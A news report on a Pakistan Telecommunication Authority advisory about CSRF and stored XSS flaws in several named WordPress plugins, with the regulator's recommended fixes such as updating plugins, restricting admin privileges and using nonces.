The Pakistan Telecommunication Authority (PTA) has issued a cybersecurity advisory warning website administrators and developers about multiple security flaws in several vulnerable WordPress plugins, posing serious risks to websites across the country.
According to the advisory, multiple Cross-Site Request Forgery (CSRF) vulnerabilities have been detected in plugins such as MetricThemes Munk Sites, FancyWP Starter Templates, OneStore Sites, WP Keyword Monitor, URL-Preview-Box, Vignette Ads, Show Notice or Message on Admin Area, WP Social Stream, and WP Admin Custom Page. These weaknesses could allow attackers to perform unauthorized actions on behalf of authenticated users without their permission.
PTA highlighted that some of these CSRF vulnerabilities could also lead to Stored Cross-Site Scripting (XSS) attacks, which may compromise website functionality, steal sensitive user data, or inject malicious code. The advisory classified the threat as high severity, citing significant exploitation potential if the flaws in these vulnerable WordPress plugins are not fixed promptly.
The regulator urged WordPress users and developers to immediately update the affected plugins to their latest versions and follow official WordPress security recommendations. It also advised restricting admin privileges, applying the principle of least privilege, and installing trusted security plugins to detect and block CSRF and XSS threats.
Additionally, PTA stressed the importance of user awareness and developer responsibility. It recommended proper implementation of CSRF tokens (nonces) and employee training on safe computing practices, including identifying phishing attempts and maintaining secure browsing habits.